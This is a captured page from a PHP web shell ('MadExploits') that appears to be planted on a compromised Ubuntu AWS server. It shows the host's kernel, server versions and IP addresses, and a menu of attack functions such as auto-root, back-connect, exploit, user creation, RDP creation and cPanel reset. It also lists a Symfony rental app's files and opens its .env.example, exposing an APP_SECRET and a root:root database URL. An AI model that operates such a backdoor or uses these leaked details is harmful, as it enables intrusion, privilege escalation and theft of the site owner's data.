Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.128.78.139
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mixchief_app /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwxr-x
bin
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
migrations
[ DIR ]
drwxrwxr-x
public
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
translations
[ DIR ]
drwxrwxr-x
var
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxr-x
.Procfile
43
B
-rw-rw-r--
.env
2.24
KB
-rw-rw-r--
.env.example
1.87
KB
-rw-rw-r--
.env.test
138
B
-rw-rw-r--
.gitignore
401
B
-rw-rw-r--
composer.json
3.14
KB
-rw-rw-r--
composer.lock
402.29
KB
-rw-rw-r--
phpunit.xml.dist
894
B
-rw-rw-r--
symfony.lock
15.44
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .env.example
# In all environments, the following files are loaded if they exist, # the later taking precedence over the former: # # * .env contains default values for the environment variables needed by the app # * .env.local uncommitted file with local overrides # * .env.$APP_ENV committed environment-specific defaults # * .env.$APP_ENV.local uncommitted environment-specific overrides # # Real environment variables win over .env files. # # DO NOT DEFINE PRODUCTION SECRETS IN THIS FILE NOR IN ANY OTHER COMMITTED FILES. # # Run "composer dump-env prod" to compile .env files for production use (requires symfony/flex >=1.2). # https://symfony.com/doc/current/best_practices/configuration.html#infrastructure-related-configuration ###> symfony/framework-bundle ### APP_ENV= APP_SECRET=6cc778a8b6ba80c3dabd879a062c37e4 #TRUSTED_PROXIES=127.0.0.1,127.0.0.2 #TRUSTED_HOSTS='^localhost|example\.com$' ###< symfony/framework-bundle ### ###> doctrine/doctrine-bundle ### # Format described at http://docs.doctrine-project.org/projects/doctrine-dbal/en/latest/reference/configuration.html#connecting-using-a-url # For an SQLite database, use: "sqlite:///%kernel.project_dir%/var/data.db" # Configure your db driver and server_version in config/packages/doctrine.yaml DATABASE_URL=mysql://root:root@localhost:3306/rental ###< doctrine/doctrine-bundle ### ###> symfony/swiftmailer-bundle ### # For Gmail as a transport, use: "gmail://username:password@localhost" # For a generic SMTP server, use: "smtp://localhost:25?encryption=&auth_mode=" # Delivery is disabled by default via "null://localhost" MAILER_URL=null://localhost ###< symfony/swiftmailer-bundle ### MAILGUN_KEY= MAILGUN_DOMAIN= PAYSTACK_SECRET= PAYSTACK_CLIENT= STANDARD_PLAN= TEST_PLAN= TEST=10000 STANDARD=500000 HOST_URL= UPLOAD_PATH= UPLOAD_ROOT_PATH= TINIFY_KEY= AWS_ACCESS_KEY_ID= AWS_SECRET_ACCESS_KEY= AWS_DEFAULT_REGION=
Close